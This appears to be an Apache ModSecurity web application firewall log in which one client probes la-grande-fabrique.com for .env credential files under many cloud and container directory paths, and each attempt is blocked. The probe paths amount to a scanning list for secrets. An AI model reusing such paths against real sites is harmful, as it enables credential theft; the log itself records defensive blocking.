[Mon May 11 16:33:50.059026 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/transactional/.env"] [unique_id "agHozlV4kyjgo4bQBUhX7QAAAM0"]
[Mon May 11 16:33:50.059290 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/transactional/.env"] [unique_id "agHozlV4kyjgo4bQBUhX7QAAAM0"]
[Mon May 11 16:33:50.222054 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bulk/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/bulk/.env"] [unique_id "agHozlV4kyjgo4bQBUhX7gAAAM0"]
[Mon May 11 16:33:50.222439 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/bulk/.env"] [unique_id "agHozlV4kyjgo4bQBUhX7gAAAM0"]
[Mon May 11 16:33:50.222632 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/bulk/.env"] [unique_id "agHozlV4kyjgo4bQBUhX7gAAAM0"]
[Mon May 11 16:33:50.222870 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/bulk/.env"] [unique_id "agHozlV4kyjgo4bQBUhX7gAAAM0"]
[Mon May 11 16:33:50.386672 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /aws/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/aws/.env"] [unique_id "agHozlV4kyjgo4bQBUhX7wAAAM0"]
[Mon May 11 16:33:50.387041 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/aws/.env"] [unique_id "agHozlV4kyjgo4bQBUhX7wAAAM0"]
[Mon May 11 16:33:50.387235 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/aws/.env"] [unique_id "agHozlV4kyjgo4bQBUhX7wAAAM0"]
[Mon May 11 16:33:50.387493 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/aws/.env"] [unique_id "agHozlV4kyjgo4bQBUhX7wAAAM0"]
[Mon May 11 16:33:50.550165 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /azure/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/azure/.env"] [unique_id "agHozlV4kyjgo4bQBUhX8AAAAM0"]
[Mon May 11 16:33:50.550534 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/azure/.env"] [unique_id "agHozlV4kyjgo4bQBUhX8AAAAM0"]
[Mon May 11 16:33:50.550713 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/azure/.env"] [unique_id "agHozlV4kyjgo4bQBUhX8AAAAM0"]
[Mon May 11 16:33:50.550949 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/azure/.env"] [unique_id "agHozlV4kyjgo4bQBUhX8AAAAM0"]
[Mon May 11 16:33:50.734240 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /gcp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/gcp/.env"] [unique_id "agHozlV4kyjgo4bQBUhX8gAAAM0"]
[Mon May 11 16:33:50.734613 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/gcp/.env"] [unique_id "agHozlV4kyjgo4bQBUhX8gAAAM0"]
[Mon May 11 16:33:50.734802 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/gcp/.env"] [unique_id "agHozlV4kyjgo4bQBUhX8gAAAM0"]
[Mon May 11 16:33:50.735041 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/gcp/.env"] [unique_id "agHozlV4kyjgo4bQBUhX8gAAAM0"]
[Mon May 11 16:33:50.897751 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cloud/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/cloud/.env"] [unique_id "agHozlV4kyjgo4bQBUhX8wAAAM0"]
[Mon May 11 16:33:50.898123 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/cloud/.env"] [unique_id "agHozlV4kyjgo4bQBUhX8wAAAM0"]
[Mon May 11 16:33:50.898315 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/cloud/.env"] [unique_id "agHozlV4kyjgo4bQBUhX8wAAAM0"]
[Mon May 11 16:33:50.898558 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/cloud/.env"] [unique_id "agHozlV4kyjgo4bQBUhX8wAAAM0"]
[Mon May 11 16:33:51.062182 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /infrastructure/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/infrastructure/.env"] [unique_id "agHoz1V4kyjgo4bQBUhX9AAAAM0"]
[Mon May 11 16:33:51.062552 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/infrastructure/.env"] [unique_id "agHoz1V4kyjgo4bQBUhX9AAAAM0"]
[Mon May 11 16:33:51.062733 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/infrastructure/.env"] [unique_id "agHoz1V4kyjgo4bQBUhX9AAAAM0"]
[Mon May 11 16:33:51.062975 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/infrastructure/.env"] [unique_id "agHoz1V4kyjgo4bQBUhX9AAAAM0"]
[Mon May 11 16:33:51.226940 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/docker/.env"] [unique_id "agHoz1V4kyjgo4bQBUhX9QAAAM0"]
[Mon May 11 16:33:51.227399 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/docker/.env"] [unique_id "agHoz1V4kyjgo4bQBUhX9QAAAM0"]
[Mon May 11 16:33:51.227591 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/docker/.env"] [unique_id "agHoz1V4kyjgo4bQBUhX9QAAAM0"]
[Mon May 11 16:33:51.227862 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/docker/.env"] [unique_id "agHoz1V4kyjgo4bQBUhX9QAAAM0"]
[Mon May 11 16:33:51.393198 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /k8s/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/k8s/.env"] [unique_id "agHoz1V4kyjgo4bQBUhX9wAAAM0"]
[Mon May 11 16:33:51.393564 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/k8s/.env"] [unique_id "agHoz1V4kyjgo4bQBUhX9wAAAM0"]
[Mon May 11 16:33:51.393744 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/k8s/.env"] [unique_id "agHoz1V4kyjgo4bQBUhX9wAAAM0"]
[Mon May 11 16:33:51.393999 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/k8s/.env"] [unique_id "agHoz1V4kyjgo4bQBUhX9wAAAM0"]
[Mon May 11 16:33:51.557007 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kubernetes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/kubernetes/.env"] [unique_id "agHoz1V4kyjgo4bQBUhX-AAAAM0"]
[Mon May 11 16:33:51.557413 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/kubernetes/.env"] [unique_id "agHoz1V4kyjgo4bQBUhX-AAAAM0"]
